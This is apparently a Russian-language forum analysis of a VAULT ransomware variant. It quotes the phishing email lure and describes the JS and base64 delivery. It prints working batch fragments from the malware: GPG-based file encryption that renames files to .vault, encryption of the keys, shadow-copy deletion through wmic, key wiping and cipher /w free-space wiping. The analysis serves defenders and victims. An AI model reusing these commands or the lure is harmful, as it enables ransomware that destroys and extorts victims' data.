июньский вариант ВАУЛТ:
Цитата:
Здравствуйте!
В соответствии с нашей информацией за Вашим предприятием до сих пор числиться недоплата (примерно 15 тыс р.).
Прошу проверить нашу информацию и ответить по возможности оплаты.
Скидываю акты и накладные по прошлогодней поставке (во вложении).
<u>ЗАГРУЗИТЬ ИНФОРМАЦИЮ</u>
С уважением,
Бухгалтер ООО Альфа-Системс Наталья Воронова
|
----------
схема распространения прежняя: через сообщения в электронную почту, со ссылкой на архив из сети. Архив содержит
js в теле которого в закодированной форме (base64) содержатся модули, необходимые для шифрования.
раскодировать
js с целью анализа исполняемых файлов можно здесь
Кодер/Декодер Base64 - Хитрые инструменты
для шифрования по прежнему используется gpg.exe v 1.4.18 в упакованном виде (UPX) и переименованным в winlogon.exe
Цитата:
gpg (GnuPG) 1.4.18
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Поддерживаются следующие алгоритмы:
С открытым ключом: RSA, RSA-E, RSA-S, ELG-E, DSA
Симметричные шифры: IDEA, 3DES, CAST5, BLOWFISH, AES, AES192, AES256, TWOFISH, CAMELLIA128, CAMELLIA192, CAMELLIA256
Хэш-функции: MD5, SHA1, RIPEMD160, SHA256, SHA384, SHA512, SHA224
Алгоритмы сжатия: Без сжатия, ZIP, ZLIB, BZIP2
|
ключевая пара, которая создается на стороне пользователя содержит имя
Cellar
Цитата:
echo Key-Type: RSA> "%temp%\d623756e.1e103e00"
echo 4PZATNvx7Pv3h2NKWbnS9zBs9PHFcmjDdS4WcTg9jhqqhAecn6 hunKm3aHPZrUp6 >nul
echo Key-Length: 1024>> "%temp%\d623756e.1e103e00"
echo Name-Real: Cellar>> "%temp%\d623756e.1e103e00"
|
ключевая пара, используемая для шифрования ключей пользователя содержит имя
VaultCrypt
схема шифрования файлов прежняя:
Цитата:
dir /B "%1:\"&& for /r "%1:\" %%i in (*.psd *.dwg *.cdr) do (
echo "%%TeMp%%\winlogon.exe" -r Cellar --yes -q --no-verbose --trust-model always --encrypt-files "%%i"^& move /y "%%i.gpg" "%%i"^& RENAME "%%i" "%%~nxi.vault">> "%temp%\a43b4e32.09831a7f"
echo %%i>> "%temp%\bb312c4a.da2279a0"
|
шифрование ключей пользователя выполняется с помощью VaultCrypt:
Цитата:
if not exist "%temp%\VAULT.KEY" (
"%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\8eacbbf1.e2fe1f1a"
RENAME "%temp%\8eacbbf1.e2fe1f1a.gpg" VAULT.KEY
)
if not exist "%temp%\CONFIRMATION.KEY" (
"%temp%\winlogon.exe" -r VaultCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\7894c7d5.0b952c1f"
RENAME "%temp%\7894c7d5.0b952c1f.gpg" CONFIRMATION.KEY
)
|
заметим, что свои приватные ключи мошенники стали менять гораздо чаще.
удаление теневых копий на дисках выполняется с помощью системной утилиты wmic.exe:
Цитата:
|
echo objShell.ShellExecute "wmic.exe", "shadowcopy delete /nointeractive", "", "runas", 0 >> "%temp%\64da1372.vbs"
|
затирание ключей шифрования происходит посредством создания мусорного ключа с перемещением его в оригинальный ключ:
Цитата:
echo 4946f1b49f393e59b1d5019835b2dfac 5c309608f24fe8ad083301a4> "%temp%\secring.qpq"
echo VgAYLnWjxRk8vVuqXRjmQG5Zpf75VG6JjFCJ9YhPUwR2BhjYnH yLyEcDkPqf9GaD >nul
echo jKypPWhc2XQMSBfnwd55kkp9dbkDA3E7aaLxPr7fMHgNTu68jg bAG4gmgJP4K3LD >nul
echo 0b952c1f5295443d 13c486b3b43238045c309608bda77785d8da5076>> "%temp%\secring.qpq"
echo 0b952c1f 5295443d13c486b3 b43238045c309608 bda77785d8da5076>> "%temp%\secring.qpq"
move /y "%temp%\secring.qpq" "%temp%\secring.gpg"
|
для затирания удаленных файлов с целью предотвращения восстановления удаленной информации используется системная утилита cipher.exe
Цитата:
if exist "%systemroot%\system32\cipher.exe" (
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :c53699f3 %%s
echo VLvqFsx2vrPgrLhuZWgT3XqJVRLw6kVeM2k6fgAhfs9bQ6MyAr Mq8k4xyZxJ >nul
goto 1acf5f5c
:c53699f3
cipher /w:%1:
|